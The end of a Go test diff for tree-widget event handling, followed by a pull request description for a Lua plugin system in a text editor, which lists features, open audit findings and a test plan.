+	// Check that events were consumed (result=1 means EventConsumed)
+	if result == 0 {
+		t.Error("click on Alpha was NOT consumed - events are not reaching the tree widget")
+	}
+	if wheelResult == 0 {
+		t.Error("wheel scroll was NOT consumed - scroll events are not reaching the tree widget")
+	}
+	if keyResult == 0 {
+		t.Error("arrow down key was NOT consumed - key events are not reaching the tree widget")
+	}
+}


### PR DESCRIPTION
## Summary
- Adds Lua-based plugin system with sandboxed VMs, permission model, and plugin lifecycle management
- Plugins can register bottom panels, sidebar panels, commands, and keybindings
- Provides Lua APIs for editor, filesystem, system, network, and events
- Widget API lets plugins render UI with tree, list, input, button, label, title, divider, hstack, vstack, box, scrollview, and dropdown widgets
- Includes 8 example plugins: notepad, color-picker, go-test-runner, http-client, markdown-preview, todo-scanner, cheat-sheet, docker-manager
- Adds OUTPUT panel for plugin logging and error routing
- Adds plugin install/uninstall/update/reload commands

## Audit
A 5-agent audit identified items to address before merge (see `audit/checklist.md`):
- 6 critical (sandbox security gaps)
- 10 high (bugs in plugin lifecycle, architecture violations)
- 55 medium (API consistency, test coverage, duplication)

## Test plan
- [x] All existing tests pass (`make test`)
- [x] E2E tests for plugin panel rendering
- [x] Manual testing of all 8 example plugins
- [ ] Address critical/high audit items
- [ ] Add tests for widget descriptors and async functions


🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_018GG9dYw2AG18ro5c2dkPtm